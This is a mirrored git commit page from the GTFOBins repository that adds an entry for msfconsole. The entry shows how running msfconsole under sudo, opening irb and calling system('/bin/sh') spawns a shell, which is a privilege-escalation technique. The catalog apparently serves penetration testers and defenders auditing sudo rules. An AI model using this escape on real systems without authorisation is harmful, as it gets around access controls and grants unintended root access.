mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-25 14:30:07 +01:00
Add msfconsole
This commit is contained in:
commit
9058ed555f
14
_gtfobins/msfconsole.md
Normal file
14
_gtfobins/msfconsole.md
Normal file
@ -0,0 +1,14 @@
|
|||||||
|
---
|
||||||
|
description: This allows to spawn a [`ruby`](/gtfobins/ruby/) interpreter.
|
||||||
|
functions:
|
||||||
|
shell:
|
||||||
|
- code: |
|
||||||
|
sudo msfconsole
|
||||||
|
msf6 > irb
|
||||||
|
>> system("/bin/sh")
|
||||||
|
sudo:
|
||||||
|
- code: |
|
||||||
|
sudo msfconsole
|
||||||
|
msf6 > irb
|
||||||
|
>> system("/bin/sh")
|
||||||
|
---
|
Loading…
Reference in New Issue
Block a user